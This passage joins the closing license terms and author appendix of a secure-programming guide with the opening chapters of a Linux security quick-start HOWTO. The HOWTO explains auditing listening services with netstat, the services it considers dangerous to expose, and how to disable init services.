     F. Include, immediately after the copyright notices, a license notice
        giving the public permission to use the Modified Version under the
        terms of this License, in the form shown in the Addendum below.

     G. Preserve in that license notice the full lists of Invariant Sections
        and required Cover Texts given in the Document's license notice.

     H. Include an unaltered copy of this License.

     I. Preserve the section entitled "History", and its title, and add to it
        an item stating at least the title, year, new authors, and publisher
        of the Modified Version as given on the Title Page. If there is no
        section entitled "History" in the Document, create one stating the
        title, year, authors, and publisher of the Document as given on its
        Title Page, then add an item describing the Modified Version as
        stated in the previous sentence.

     J. Preserve the network location, if any, given in the Document for
        public access to a Transparent copy of the Document, and likewise the
        network locations given in the Document for previous versions it was
        based on. These may be placed in the "History" section. You may omit
        a network location for a work that was published at least four years
        before the Document itself, or if the original publisher of the
        version it refers to gives permission.

     K. In any section entitled "Acknowledgements" or "Dedications", preserve
        the section's title, and preserve in the section all the substance
        and tone of each of the contributor acknowledgements and/or
        dedications given therein.

     L. Preserve all the Invariant Sections of the Document, unaltered in
        their text and in their titles. Section numbers or the equivalent are
        not considered part of the section titles.

     M. Delete any section entitled "Endorsements". Such a section may not be
        included in the Modified Version.

     N. Do not retitle any existing section as "Endorsements" or to conflict
        in title with any Invariant Section.


    If the Modified Version includes new front-matter sections or appendices
    that qualify as Secondary Sections and contain no material copied from
    the Document, you may at your option designate some or all of these
    sections as invariant. To do this, add their titles to the list of
    Invariant Sections in the Modified Version's license notice. These titles
    must be distinct from any other section titles.

    You may add a section entitled "Endorsements", provided it contains
    nothing but endorsements of your Modified Version by various parties--for
    example, statements of peer review or that the text has been approved by
    an organization as the authoritative definition of a standard.

    You may add a passage of up to five words as a Front-Cover Text, and a
    passage of up to 25 words as a Back-Cover Text, to the end of the list of
    Cover Texts in the Modified Version. Only one passage of Front-Cover Text
    and one of Back-Cover Text may be added by (or through arrangements made
    by) any one entity. If the Document already includes a cover text for the
    same cover, previously added by you or by arrangement made by the same
    entity you are acting on behalf of, you may not add another; but you may
    replace the old one, on explicit permission from the previous publisher
    that added the old one.

    The author(s) and publisher(s) of the Document do not by this License
    give permission to use their names for publicity for or to assert or
    imply endorsement of any Modified Version .

5. COMBINING DOCUMENTS
    You may combine the Document with other documents released under this
    License, under the terms defined in section 4 above for modified
    versions, provided that you include in the combination all of the
    Invariant Sections of all of the original documents, unmodified, and list
    them all as Invariant Sections of your combined work in its license
    notice.

    The combined work need only contain one copy of this License, and
    multiple identical Invariant Sections may be replaced with a single copy.
    If there are multiple Invariant Sections with the same name but different
    contents, make the title of each such section unique by adding at the end
    of it, in parentheses, the name of the original author or publisher of
    that section if known, or else a unique number. Make the same adjustment
    to the section titles in the list of Invariant Sections in the license
    notice of the combined work.

    In the combination, you must combine any sections entitled "History" in
    the various original documents, forming one section entitled "History";
    likewise combine any sections entitled "Acknowledgements", and any
    sections entitled "Dedications". You must delete all sections entitled
    "Endorsements."

6. COLLECTIONS OF DOCUMENTS
    You may make a collection consisting of the Document and other documents
    released under this License, and replace the individual copies of this
    License in the various documents with a single copy that is included in
    the collection, provided that you follow the rules of this License for
    verbatim copying of each of the documents in all other respects.

    You may extract a single document from such a collection, and distribute
    it individually under this License, provided you insert a copy of this
    License into the extracted document, and follow this License in all other
    respects regarding verbatim copying of that document.

7. AGGREGATION WITH INDEPENDENT WORKS
    A compilation of the Document or its derivatives with other separate and
    independent documents or works, in or on a volume of a storage or
    distribution medium, does not as a whole count as a Modified Version of
    the Document, provided no compilation copyright is claimed for the
    compilation. Such a compilation is called an "aggregate", and this
    License does not apply to the other self-contained works thus compiled
    with the Document , on account of their being thus compiled, if they are
    not themselves derivative works of the Document. If the Cover Text
    requirement of section 3 is applicable to these copies of the Document,
    then if the Document is less than one quarter of the entire aggregate,
    the Document's Cover Texts may be placed on covers that surround only the
    Document within the aggregate. Otherwise they must appear on covers
    around the whole aggregate.

8. TRANSLATION
    Translation is considered a kind of modification, so you may distribute
    translations of the Document under the terms of section 4. Replacing
    Invariant Sections with translations requires special permission from
    their copyright holders, but you may include translations of some or all
    Invariant Sections in addition to the original versions of these
    Invariant Sections. You may include a translation of this License
    provided that you also include the original English version of this
    License. In case of a disagreement between the translation and the
    original English version of this License, the original English version
    will prevail.

9. TERMINATION
    You may not copy, modify, sublicense, or distribute the Document except
    as expressly provided for under this License. Any other attempt to copy,
    modify, sublicense or distribute the Document is void, and will
    automatically terminate your rights under this License. However, parties
    who have received copies, or rights, from you under this License will not
    have their licenses terminated so long as such parties remain in full
    compliance.

10. FUTURE REVISIONS OF THIS LICENSE
    The Free Software Foundation may publish new, revised versions of the GNU
    Free Documentation License from time to time. Such new versions will be
    similar in spirit to the present version, but may differ in detail to
    address new problems or concerns. See [http://www.gnu.org/copyleft] http:
    //www.gnu.org/copyleft/.

    Each version of the License is given a distinguishing version number. If
    the Document specifies that a particular numbered version of this License
    "or any later version" applies to it, you have the option of following
    the terms and conditions either of that specified version or of any later
    version that has been published (not as a draft) by the Free Software
    Foundation. If the Document does not specify a version number of this
    License, you may choose any version ever published (not as a draft) by
    the Free Software Foundation.

Addendum
    To use this License in a document you have written, include a copy of the
    License in the document and put the following copyright and license
    notices just after the title page:

    Copyright <20> YEAR YOUR NAME.

    Permission is granted to copy, distribute and/or modify this document
    under the terms of the GNU Free Documentation License, Version 1.1 or any
    later version published by the Free Software Foundation; with the
    Invariant Sections being LIST THEIR TITLES, with the Front-Cover Texts
    being LIST, and with the Back-Cover Texts being LIST. A copy of the
    license is included in the section entitled "GNU Free Documentation
    License".

    If you have no Invariant Sections, write "with no Invariant Sections"
    instead of saying which ones are invariant. If you have no Front-Cover
    Texts, write "no Front-Cover Texts" instead of "Front-Cover Texts being
    LIST"; likewise for Back-Cover Texts.

    If your document contains nontrivial examples of program code, we
    recommend releasing these examples in parallel under your choice of free
    software license, such as the GNU General Public License, to permit their
    use in free software.


-----------------------------------------------------------------------------
Appendix E. Endorsements

This version of the document is endorsed by the original author, David A.
Wheeler, as a document that should improve the security of programs, when
applied correctly. Note that no book, including this one, can guarantee that
a developer who follows its guidelines will produce perfectly secure
software. Modifications (including translations) must remove this appendix
per the license agreement included above.
-----------------------------------------------------------------------------

Appendix F. About the Author

[dwheeler2003b]

David A. Wheeler

David A. Wheeler is an expert in computer security and has long specialized
in development techniques for large and high-risk software systems. He has
been involved in software development since the mid-1970s, and been involved
with Unix and computer security since the early 1980s. His areas of knowledge
include computer security, software safety, vulnerability analysis,
inspections, Internet technologies, software-related standards (including
POSIX), real-time software development techniques, and numerous computer
languages (including Ada, C, C++, Perl, Python, and Java).

Mr. Wheeler is co-author and lead editor of the IEEE book Software
Inspection: An Industry Best Practice, author of the book Ada95: The Lovelace
Tutorial, and co-author of the GNOME User's Guide. He is also the author of
many smaller papers and articles, including the Linux Program Library HOWTO.

Mr. Wheeler hopes that, by making this document available, other developers
will make their software more secure. You can reach him by email at
dwheeler@dwheeler.com (no spam please), and you can also see his web site at
[http://www.dwheeler.com] http://www.dwheeler.com.

Notes

[1]  Technically, a hypertext link can be any ``uniform resource identifier''
     (URI). The term "Uniform Resource Locator" (URL) refers to the subset of
     URIs that identify resources via a representation of their primary
     access mechanism (e.g., their network "location"), rather than
     identifying the resource by name or by some other attribute(s) of that
     resource. Many people use the term ``URL'' as synonymous with ``URI'',
     since URLs are the most common kind of URI. For example, the encoding
     used in URIs is actually called ``URL encoding''.

Security Quick-Start HOWTO for Linux

Hal Burgiss

<A0><A0><A0><A0><A0>hal@foobox.net
<A0><A0><A0><A0>

v. 1.2, 2002-07-21
Revision History
Revision v. 1.2             2002-07-21           Revised by: hb
A few small additions, and fix the usual broken links.
Revision v. 1.1             2002-02-06           Revised by: hb
A few fixes, some additions and many touch-ups from the original.
Revision v. 1.0             2001-11-07           Revised by: hb
Initial Release.


This document is a an overview of the basic steps required to secure a Linux
installation from intrusion. It is intended to be an introduction.

-----------------------------------------------------------------------------
Table of Contents
1. Introduction
    1.1. Why me?
    1.2. Copyright
    1.3. Credits
    1.4. Disclaimer
    1.5. New Versions and Changelog
    1.6. Feedback


2. Foreword
    2.1. The Optimum Configuration
    2.2. Before We Start


3. Step 1: Which services do we really need?
    3.1. System Audit
    3.2. The Danger Zone (or r00t m3 pl34s3)
    3.3. Stopping Services
    3.4. Exceptions
    3.5. Summary and Conclusions for Step 1


4. Step 2: Updating
    4.1. Summary and Conclusions for Step 2


5. Step 3: Firewalls and Setting Access Policies
    5.1. Strategy
    5.2. Packet Filters -- Ipchains and Iptables
    5.3. Tcpwrappers (libwrap)
    5.4. PortSentry
    5.5. Proxies
    5.6. Individual Applications
    5.7. Verifying
    5.8. Logging
    5.9. Where to Start
    5.10. Summary and Conclusions for Step 3


6. Intrusion Detection
    6.1. Intrusion Detection Systems (IDS)
    6.2. Have I Been Hacked?
    6.3. Reclaiming a Compromised System


7. General Tips
8. Appendix
    8.1. Servers, Ports, and Packets
    8.2. Common Ports
    8.3. Netstat Tutorial
    8.4. Attacks and Threats
    8.5. Links
    8.6. Editing Text Files
    8.7. nmap
    8.8. Sysctl Options
    8.9. Secure Alternatives
    8.10. Ipchains and Iptables Redux


1. Introduction

1.1. Why me?

Who should be reading this document and why should the average Linux user
care about security? Those new to Linux, or unfamiliar with the inherent
security issues of connecting a Linux system to large networks like Internet
should be reading. "Security" is a broad subject with many facets, and is
covered in much more depth in other documents, books, and on various sites on
the Web. This document is intended to be an introduction to the most basic
concepts as they relate to Linux, and as a starting point only.


Iptables<A0>Weekly<A0>Log<A0>Summary<A0>from<A0>Jul<A0>15<A0>04:24:13<31>to<74>Jul<75>22<32>04:06:00
Blocked<A0>Connection<A0>Attempts:

Rejected<A0>tcp<A0>packets<A0>by<A0>destination<A0>port

port<A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0>count
111<A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0>19
53<A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0>12
21<A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0>9
515<A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0>9
27374<A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0>8
443<A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0>6
1080<A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0>2
1138<A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0>1


Rejected<A0>udp<A0>packets<A0>by<A0>destination<A0>port

port<A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0>count
137<A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0>34
22<A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0>1

<A0><A0><A0><A0>

The above is real, live data from a one week period for my home LAN. Much of
the above would seem to be specifically targeted at Linux systems. Many of
the targeted "destination" ports are used by well known Linux and Unix
services, and all may be installed, and possibly even running, on your
system.

The focus here will be on threats that are shared by all Linux users, whether
a dual boot home user, or large commercial site. And we will take a few,
relatively quick and easy steps that will make a typical home Desktop system
or small office system running Linux reasonably safe from the majority of
outside threats. For those responsible for Linux systems in a larger or more
complex environment, you'd be well advised to read this, and then follow up
with additional reading suitable to your particular situation. Actually, this
is probably good advice for everybody.

We will assume the reader knows little about Linux, networking, TCP/IP, and
the finer points of running a server Operating System like Linux. We will
also assume, for the sake of this document, that all local users are
"trusted" users, and won't address physical or local network security issues
in any detail. Again, if this is not the case, further reading is strongly
recommended.

The principles that will guide us in our quest are:

<A0><A0>*<2A>There is no magic bullet. There is no one single thing we can do to make
    us secure. It is not that simple.

<A0><A0>*<2A>Security is a process that requires maintenance, not an objective to be
    reached.

<A0><A0>*<2A>There is no 100% safe program, package or distribution. Just varying
    degrees of insecurity.


The steps we will be taking to get there are:

<A0><A0>*<2A>Step 1: Turn off, and perhaps uninstall, any and all unnecessary
    services.

<A0><A0>*<2A>Step 2: Make sure that any services that are installed are updated and
    patched to the current, safe version -- and then stay that way. Every
    server application has potential exploits. Some have just not been found
    yet.

<A0><A0>*<2A>Step 3: Limit connections to us from outside sources by implementing a
    firewall and/or other restrictive policies. The goal is to allow only the
    minimum traffic necessary for whatever our individual situation may be.

<A0><A0>*<2A>Awareness. Know your system, and how to properly maintain and secure it.
    New vulnerabilities are found, and exploited, all the time. Today's
    secure system may have tomorrow's as yet unfound weaknesses.


If you don't have time to read everything, concentrate on Steps 1, 2, and 3.
This is where the meat of the subject matter is. The Appendix has a lot of
supporting information, which may be helpful, but may not be necessary for
all readers.
-----------------------------------------------------------------------------

1.2. Copyright

Security-Quickstart HOWTO for Linux

Copyright <20> 2001 Hal Burgiss.

This document is free; you can redistribute it and/or modify it under the
terms of the GNU General Public License as published by the Free Software
Foundation; either version 2 of the License, or (at your option) any later
version.

This document is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.

You can get a copy of the GNU GPL at at [http://www.gnu.org/copyleft/
gpl.html] http://www.gnu.org/copyleft/gpl.html.
-----------------------------------------------------------------------------

1.3. Credits

Many thanks to those who helped with the production of this document.

<A0><A0>*<2A>Bill Staehle, who has done a little bit of everything: ideas, editing,
    encouragement, and suggestions, many of which have been incorporated.
    Bill helped greatly with the content of this document.

<A0><A0>*<2A>Others who have contributed in one way or another: Dave Wreski, Ian
    Jones, Jacco de Leeuw, and Indulis Bernsteins.

<A0><A0>*<2A>Various posters on comp.os.linux.security, a great place to learn about
    Linux and security.

<A0><A0>*<2A>The Netfilter Development team for their work on iptables and connection
    tracking, state of the art tools with which to protect our systems.


-----------------------------------------------------------------------------
1.4. Disclaimer

The author accepts no liability for the contents of this document. Use the
concepts, examples and other content at your own risk. As this is a new
document, there may be errors and inaccuracies. Hopefully these are few and
far between. Corrections and suggestions are welcomed.

This document is intended to give the new user a starting point for securing
their system while it is connected to the Internet. Please understand that
there is no intention whatsoever of claiming that the contents of this
document will necessarily result in an ultimately secure and worry-free
computing environment. Security is a complex topic. This document just
addresses some of the most basic issues that inexperienced users should be
aware of.

The reader is encouraged to read other security related documentation and
articles. And to stay abreast of security issues as they evolve. Security is
not an objective, but an ongoing process.
-----------------------------------------------------------------------------

1.5. New Versions and Changelog

The current official version can always be found at [http://www.tldp.org/
HOWTO/Security-Quickstart-HOWTO/] http://www.tldp.org/HOWTO/
Security-Quickstart-HOWTO/. Pre-release versions can be found at [http://
feenix.burgiss.net/ldp/quickstart/] http://feenix.burgiss.net/ldp/quickstart
/.

Other formats, including PDF, PS, single page HTML, may be found at the Linux
Documentation HOWTO index page: [http://tldp.org/docs.html#howto] http://
tldp.org/docs.html#howto.

Changelog:

Version 1.2: Clarifications on example firewall scripts, and small additions
to 'Have I been Hacked'. Note on Zonealarm type applications. More on the use
of "chattr" by script kiddies, and how to check for this. Other small
additions and clarifications.

Version 1.1: Various corrections, amplifications and numerous mostly small
additions. Too many to list. Oh yea, learn to spell Red Hat correctly ;-)

Version 1.0: This is the initial release of this document. Comments welcomed.
-----------------------------------------------------------------------------

1.6. Feedback

Any and all comments on this document are most welcomed. Please make sure you
have the most current version before submitting corrections or suggestions!
These can be sent to <hal@foobox.net>.
-----------------------------------------------------------------------------

2. Foreword

Before getting into specifics, let's try to briefly answer some questions
about why we need to be concerned about security in the first place.

It is easy to see why an e-commerce site, an on-line bank, or a government
agency with sensitive documents would be concerned about security. But what
about the average user? Why should even a Linux home Desktop user worry about
security?

Anyone connected to the Internet is a target, plain and simple. It makes
little difference whether you have a part-time dialup connection, or a
full-time connection, though full-time connections make for bigger targets.
Larger sites make for bigger targets too, but this does not let small users
off the hook since the "small user" may be less skilled and thus an easier
victim.

There are those out there that are scanning just for easy victims all the
time. If you start logging unwanted connection attempts, you will see this
soon enough. There is little doubt that many of these attempts are
maliciously motivated and the attacker, in some cases, is looking for Linux
boxes to crack. Does someone on the other side of the globe really want to
borrow my printer?

What do they want? Often, they just may want your computer, your IP address,
and your bandwidth. Then they use you to either attack others, or possibly
commit crimes or mischief and are hiding their true identity behind you. This
is an all too common scenario. Commercial and high-profile sites are targeted
more directly and have bigger worries, but we all face this type of common
threat.

With a few reasonable precautions, Linux can be very secure, and with all the
available tools, makes for a fantastically fun and powerful Internet
connection or server. Most successful break-ins are the result of ignorance
or carelessness.

The bottom line is:

<A0><A0>*<2A>Do you want control of your own system or not?

<A0><A0>*<2A>Do you want to unwittingly participate in criminal activity?

<A0><A0>*<2A>Do you want to be used by someone else?

<A0><A0>*<2A>Do you want to risk losing your Internet connection?

<A0><A0>*<2A>Do you want to have to go through the time consuming steps of reclaiming
    your system?

<A0><A0>*<2A>Do you want to chance the loss of data on your system?


These are all real possibilities, unless we take the appropriate precautions.

Warning If you are reading this because you have already been broken into, or
        suspect that you have, you cannot trust any of your system utilities
        to provide reliable information. And the suggestions made in the next
        several sections will not help you recover your system. Please jump
        straight to the Have I been Hacked? section, and read that first.
-----------------------------------------------------------------------------

2.1. The Optimum Configuration

Ideally, we would want one computer as a dedicated firewall and router. This
would be a bare bones installation, with no servers running, and only the
required services and components installed. The rest of our systems would
connect via this dedicated router/firewall system. If we wanted publicly
accessible servers (web, mail, etc), these would be in a "DMZ"
(De-militarized Zone). The router/firewall allows connections from outside to
whatever services are running in the DMZ by "forwarding" these requests, but
it is segregated from the rest of the internal network (aka LAN) otherwise.
This leaves the rest of the internal network in fairly secure isolation, and
relative safety. The "danger zone" is confined to the DMZ.

But not everyone has the hardware to dedicate to this kind of installation.
This would require a minimum of two computers. Or three, if you would be
running any publicly available servers (not a good idea initially). Or maybe
you are just new to Linux, and don't know your way around well enough yet. So
if we can't do the ideal installation, we will do the next best thing.
-----------------------------------------------------------------------------

2.2. Before We Start

Before we get to the actual configuration sections, a couple of notes.

First, one of the interesting aspects of Linux, is the different
distributions like Caldera, Red Hat, SuSE, and Debian. While these are all
"Linux", and may share certain features, there is surely some differences as
to what utilities they may install as defaults. Most Linux distributions will
write their own system configuration tools as well. And with Linux, there is
always more than one way to skin a cat. But for the purposes of our
discussion, we will have to use as generic set of tools as we can.
Unfortunately, GUI tools don't lend themselves to this type of documentation.
We will be using text based, command line tools for the most part. If you are
familiar with your distribution's utilities, feel free to substitute those in
appropriate places. And if not, you should learn them or suitable
alternatives.

The next several sections have been written such that you can perform the
recommended procedures as you read along. This is the "Quick Start" in the
document title!

To get ready, what you will need for the configuration sections below:

<A0><A0>*<2A>A text editor. There are many available. If you use a file manager
    application , it probably has a built in editor. This will be fine. pico
    and mcedit are two relatively easy to use editors if you don't already
    have a favorite. There is a quick guide to Text editors in the Appendix
    that might help you get started. It is always a good idea to make a back
    up copy, before editing system configuration files.

<A0><A0>*<2A>For non-GUI editors and some of the commands, you will also need a
    terminal window opened. xterm, rxvt, and gnome-terminal all will work, as
    well as others.

<A0><A0>*<2A>You should also be familiar with your distribution's method of stopping
    services from running on each boot. Also, how they install (and
    uninstall) packages (rpm, deb, etc). And where to find the updates for
    your release. This information is available in your release's
    documentation, or on your vendor's web site.


We'll be using a hypothetical system here for examples with the hostname
"bigcat". Bigcat is a Linux desktop with a fresh install of the latest/
greatest Linux distro running. Bigcat has a full-time, direct Internet
connection. Even if your installation is not so "fresh", don't be deterred.
Better late than never.
-----------------------------------------------------------------------------

3. Step 1: Which services do we really need?

In this section we will see which services are running on our freshly
installed system, decide which we really need, and do away with the rest. If
you are not familiar with how servers and TCP connections work, you may want
to read the section on servers and ports in the Appendix first. If not
familiar with the netstat utility, you may want to read a quick overview of
it beforehand. There is also a section in the Appendix on ports, and
corresponding services. You may want to look that over too.

Our goal is to turn off as many services as possible. If we can turn them all
off, or at least off to outside connections, so much the better. Some rules
of thumb we will use to guide us:

<A0><A0>*<2A>It is perfectly possible to have a fully functional Internet connection
    with no servers running that are accessible to outside connections. Not
    only possible, but desirable in many cases. The principle here is that
    you will never be successfully broken into via a port that is not opened
    because no server is listening on it. No server == no port open == not
    vulnerable. At least to outside connections.

<A0><A0>*<2A>If you don't recognize a particular service, chances are good you don't
    really need it. We will assume that and so we'll turn it off. This may
    sound dangerous, but is a good rule of thumb to go by.

<A0><A0>*<2A>Some services are just not intended to be run over the Internet -- even
    if you decide it is something you really do need. We'll flag these as
    dangerous, and address these in later sections, should you decide you do
    really need them, and there is no good alternative.


-----------------------------------------------------------------------------
3.1. System Audit

So what is really running on our system anyway? Let's not take anything for
granted about what "should" be running, or what we "think" is running.

Unfortunately, there is no such things as a standard Linux installation. The
wide variety of servers available, coupled with each particular
distribution's installation options, make providing a ready made list
impossible. The best that can be done is show you how to list all running
services, and point you in the right general direction.

Now open an xterm, and su to root. You'll need to widen the window wide so
the lines do not wrap. Use this command: netstat -tap |grep LISTEN. This will
give us a list of all currently running servers as indicated by the keyword
LISTEN, along with the "PID" and "Program Name" that started each particular
service.

+----------------------------------------------------------------------------------+
|# netstat -tap |grep LISTEN                                                       |
|  *:exec               *:*        LISTEN    988/inetd                             |
|  *:login              *:*        LISTEN    988/inetd                             |
|  *:shell              *:*        LISTEN    988/inetd                             |
|  *:printer            *:*        LISTEN    988/inetd                             |
|  *:time               *:*        LISTEN    988/inetd                             |
|  *:x11                *:*        LISTEN    1462/X                                |
|  *:http               *:*        LISTEN    1078/httpd                            |
|  bigcat:domain        *:*        LISTEN    956/named                             |
|  bigcat:domain        *:*        LISTEN    956/named                             |
|  *:ssh                *:*        LISTEN    972/sshd                              |
|  *:auth               *:*        LISTEN    388/in.identd                         |
|  *:telnet             *:*        LISTEN    988/inetd                             |
|  *:finger             *:*        LISTEN    988/inetd                             |
|  *:sunrpc             *:*        LISTEN    1290/portmap                          |
|  *:ftp                *:*        LISTEN    988/inetd                             |
|  *:smtp               *:*        LISTEN    1738/sendmail: accepting connections  |
|  *:1694               *:*        LISTEN    1319/rpc.mountd                       |
|  *:netbios-ssn        *:*        LISTEN    422/smbd                              |
|                                                                                  |
|                                                                                  |
+----------------------------------------------------------------------------------+

Note the first three columns are cropped above for readability. If your list
is as long as the example, you have some work ahead of you! It is highly
unlikely that you really need anywhere near this number of servers running.

Please be aware that the example above is just one of many, many possible
system configurations. Yours probably does look very different.

You don't understand what any of this is telling you? Hopefully then, you've
read the netstat tutorial in the Appendix, and understand how it works.
Understanding exactly what each server is in the above example, and what it
does, is beyond the scope of this document. You will have to check your
system's documentation (e.g. Installation Guide, man pages, etc) if that
service is important to you. For example, does "exec", "login", and "shell"
sound important? Yes, but these are not what they may sound like. They are
actually rexec, rlogin, and rsh, the "r" (for remote) commands. These are
antiquated, unnecessary, and in fact, are very dangerous if exposed to the
Internet.

Let's make a few quick assumptions about what is necessary and unnecessary,
and therefore what goes and what stays on bigcat. Since we are running a
desktop on bigcat, X11 of course needs to stay. If bigcat were a dedicated
server of some kind, then X11 would be unnecessary. If there is a printer
physically attached, the printer (lp) daemon should stay. Otherwise, it goes.
Print servers may sound harmless, but are potential targets too since they
can hold ports open. If we plan on logging in to bigcat from other hosts,
sshd (Secure SHell Daemon) would be necessary. If we have Microsoft hosts on
our LAN, we probably want Samba, so smbd should stay. Otherwise, it is
completely unnecessary. Everything else in this example is optional and not
required for a normally functioning system, and should probably go. See
anything that you don't recognize? Not sure about? It goes!

To sum up: since bigcat is a desktop with a printer attached, we will need
"x11", "printer". bigcat is on a LAN with MS hosts, and shares files and
printing with them, so "netbios-ssn" (smbd) is desired. We will also need
"ssh" so we can login from other machines. Everything else is unnecessary for
this particular case.

Nervous about this? If you want, you can make notes of any changes you make
or save the list of servers you got from netstat, with this command: netstat
-tap |grep LISTEN > ~/services.lst. That will save it your home directory
with the name of "services.lst" for future reference.

This is to not say that the ones we have decided to keep are inherently safe.
Just that we probably need these. So we will have to deal with these via
firewalling or other means (addressed below).

It is worth noting that the telnet and ftp daemons in the above example are
servers, aka "listeners". These accept incoming connections to you. You do
not need, or want, these just to use ftp or telnet clients. For instance, you
can download files from an FTP site with just an ftp client. Running an ftp
server on your end is not required at all, and has serious security
implications.

There may be individual situations where it is desirable to make exceptions
to the conclusions reached above. See below.
-----------------------------------------------------------------------------

3.2. The Danger Zone (or r00t m3 pl34s3)

The following is a list of services that should not be run over the Internet.
Either disable these (see below), uninstall, or if you really do need these
services running locally, make sure they are the current, patched versions
and that they are effectively firewalled. And if you don't have a firewall in
place now, turn them off until it is up and verified to be working properly.
These are potentially insecure by their very nature, and as such are prime
cracker targets.

<A0><A0>*<2A>NFS (Network File System) and related services, including nfsd, lockd,
    mountd, statd, portmapper, etc. NFS is the standard Unix service for
    sharing file systems across a network. Great system for LAN usage, but
    dangerous over the Internet. And its completely unnecessary on a stand
    alone system.

<A0><A0>*<2A>rpc.* services, Remote Procedure Call.*, typically NFS and NIS related
    (see above).

<A0><A0>*<2A>Printer services (lpd).

<A0><A0>*<2A>The so-called r* (for "remote", i.e. Remote SHell) services: rsh, rlogin,
    rexec, rcp etc. Unnecessary, insecure and potentially dangerous, and
    better utilities are available if these capabilities are needed. ssh will
    do everything these command do, and in a much more sane way. See the man
    pages for each if curious. These will probably show in netstat output
    without the "r": rlogin will be just "login", etc.

<A0><A0>*<2A>telnet server. There is no reason for this anymore. Use sshd instead.

<A0><A0>*<2A>ftp server. There are better, safer ways for most systems to exchange
    files like scp or via http (see below). ftp is a proper protocol only for
    someone who is running a dedicated ftp server, and who has the time and
    skill to keep it buttoned down. For everyone else, it is potentially big
    trouble.

<A0><A0>*<2A>BIND (named), DNS server package. With some work, this can be done
    without great risk, but is not necessary in many situations, and requires
    special handling no matter how you do it. See the sections on Exceptions
    and special handling for individual applications.

<A0><A0>*<2A>Mail Transport Agent, aka "MTA" (sendmail, exim, postfix, qmail). Most
    installations on single computers will not really need this. If you are
    not going to be directly receiving mail from Internet hosts (as a
    designated MX box), but will rather use the POP server of your ISP, then
    it is not needed. You may however need this if you are receiving mail
    directly from other hosts on your LAN, but initially it's safer to
    disable this. Later, you can enable it over the local interface once your
    firewall and access policies have been implemented.


This is not necessarily a definitive list. Just some common services that are
sometimes started on default Linux installations. And conversely, this does
not imply that other services are inherently safe.
-----------------------------------------------------------------------------

3.3. Stopping Services

The next step is to find where each server on our kill list is being started.
If it is not obvious from the netstat output, use ps, find, grep or locate to
find more information from the "Program name" or "PID" info in the last
column. There is examples of this in the Process Owner section in the netstat
Tutorial of the Appendix. If the service name or port number do not look
familiar to you, you might get a real brief explanation in your /etc/services
file.

Skeptical that we are going to break your system, and the pieces won't go
back together again? If so, take this approach: turn off everything listed
above in "The Danger Zone", and run your system for a while. OK? Try stopping
one of the ones we found to be "unnecessary" above. Then, run the system for
a while. Keep repeating this process, until you get to the bare minimum. If
this works, then make the changes permanent (see below).

The ultimate objective is not just to stop the service now, but to make sure
it is stopped permanently! So whatever steps you take here, be sure to check
after your next reboot.

There are various places and ways to start system services. Let's look at the
most common ways this is done, and is probably how your system works. System
services are typically either started by "init" scripts, or by inetd (or its
replacement xinetd) on most distributions. (The location of the init scripts
may vary from distribution to distribution.)
-----------------------------------------------------------------------------

3.3.1. Stopping Init Services

Init services are typically started automatically during the boot process, or
during a runlevel change. There is a naming scheme that uses symlinks to
determine which services are to be started, or stopped, at any given
runlevel. The scripts themselves should be in /etc/init.d/ (or possibly /etc/
rc.d/init.d/ ). This init style is used by Red Hat, SuSE, Mandrake, Debian,
Conectiva, and most Linuxes. Slackware is one notable exception (though
recent versions have an option for this)! Typically on Slackware system
services are all configured in one file: /etc/rc.d/rc.inet2.

You can get a listing of these scripts:

+---------------------------------------------------------------------------+
|  # ls -l /etc/init.d/ | less                                              |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

Or use whichever tools your distribution provides for this.

To stop a running service now, as root (on SysVinit style systems, which is
pretty much everybody):

+---------------------------------------------------------------------------+
| # /etc/init.d/<$SERVICE_NAME> stop                                        |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

Where "$SERVICE_NAME" is the name of the init script, which is often, but not
always, the same as the service name itself. This should do the trick on most
distributions. Older Red Hat versions may use the path /etc/rc.d/init.d/
instead.

This only stops this particular service now. It will restart again on the
next reboot, or runlevel change, unless additional steps are taken. So this
is really a two step process for init type services.

Your distribution will have utilities available for controlling which
services are started at various runlevels. Debian based systems have
update-rc.d for this, and Red Hat based systems have chkconfig. If you are
familiar with these tools, do it now, and then check again after the next
reboot. If you are not familiar with these tools, see the man pages and learn
it now! This is something that you need to know. For Debian (where
$SERVICE_NAME is the init script name):

+---------------------------------------------------------------------------+
|                                                                           |
|  # update-rc.d -f $SERVICE_NAME remove                                    |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

And Red Hat:

+---------------------------------------------------------------------------+
|                                                                           |
| # chkconfig $SERVICE_NAME off                                             |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

Another option here is to uninstall a package if you know you do not need it.
This is a pretty sure-fire, permanent fix. This also alleviates the potential
problem of keeping all installed packages updated and current (Step 2). And,
package management systems like RPM or DEB make it very easy to re-install a
package should you change your mind.
-----------------------------------------------------------------------------

3.3.2. Inetd

Inetd is called a "super-daemon" because it is used to spawn sub-daemons.
inetd itself will generally be started via init scripts, and will "listen" on
the various ports as determined by which services are enable in its
configuration file, /etc/inetd.conf. Any service listed here will be under
the control of inetd. Likewise, any of the listening servers in netstat
output that list "inetd" in the last column under "Program Name", will have
been started by inetd. You will have to adjust the inetd configuration to
